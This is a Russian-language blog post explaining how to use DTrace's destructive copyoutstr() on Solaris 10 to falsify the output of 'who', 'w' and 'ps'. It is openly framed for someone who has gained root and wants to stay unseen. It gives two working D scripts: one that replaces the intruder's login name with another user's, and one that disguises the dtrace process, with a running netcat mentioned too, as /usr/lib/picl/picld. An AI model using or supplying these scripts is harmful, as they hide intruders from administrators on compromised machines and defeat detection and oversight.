SunHelp.Ru : DTrace: меняем вывод "who" и "ps"

Не знаю, кому это может пригодиться, но, скажем, получили вы вдруг рута на какой-нибудь десятой соляре, и хотите чтобы в ближайшие полчаса вас в системе не видели, а вместо вас видели бы какого-нибудь Пупкина, который и так там сидит постоянно, или вообще nobody, или вдруг вы хотите чтобы запущенный вами netcat по ps виделся бы как какой-нибудь второй процесс /usr/lib/picl/picld.

Предположим, на машину вы зашли как пользователь green. В нашем темном деле будем использовать DTrace, а если точнее - деструктивную функцию copyoutstr(), уже знакомую нам по скрипту liar.d. Пишем на скорую руку небольшой скриптик:

#!/usr/sbin/dtrace -ws
#pragma D option quiet

syscall::write:entry
/ (execname == "w" || execname == "who") && strstr(copyinstr(arg1),"green") != NULL /
{
copyoutstr("pupkin", arg1, 6);
}

Запускаем, и теперь, если кто-то захочет увидеть с помощью "w" (или "who"), кто в данный момент в системе, вы теперь pupkin:



~$ who

alex       pts/1        Sep 24 09:29    (192.168.1.35)

pupkin     pts/3        Sep 24 10:34    (192.168.1.11)

fag        pts/5        Sep 24 12:04    (192.168.1.112)

fag        pts/6        Sep 24 12:47    (192.168.1.126)

pupkin     pts/2        Sep 24 10:34    (192.168.1.11)

Такой же номер можно проделать и с командой ps. Правда, есть два момента - если кто-то запускает, скажем, не просто ps -ef, а ps -ef | grep green, то номер не прокатывает. Второе - надо же спрятать процесс самого скрипта dtrace, или поменять не логин в выводе, а имя запускаемой программы - что впрочем, в ваших силах: например, добавив в скрипт что-нибудь типа:

syscall::write:entry
/execname == "ps" && strstr(copyinstr(arg1),"dtrace") != NULL /
{
copyoutstr("/usr/lib/picl/picld ",arg1+50,30);
}

Вряд ли кто-нибудь заинтересуется вторым процессом /usr/lib/picl/picld, ну а с цифрами можно поиграть.

Alexander Eremin в категории DTrace, Solaris в 15:08 | Комментарии (0) | Обратные ссылки (0)

Обратные ссылки

URI этой записи для создания обратных ссылок (trackback)

Нет обратных ссылок

Комментарии

Показывать комментарии (Как список | Древовидной структурой)

Нет комментариев.

Добавить комментарий

Имя
Email
Домашняя страница
В ответ на
Комментарий	Enclosing asterisks marks text as bold (word), underscore are made via _word_. Standard emoticons like :-) and ;-) are converted to images. To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly. Enter the string from the spam-prevention image above:
	Запомнить информацию? Подписаться на эту запись
Добавленные комментарии должны будут пройти модерацию прежде, чем будут показаны.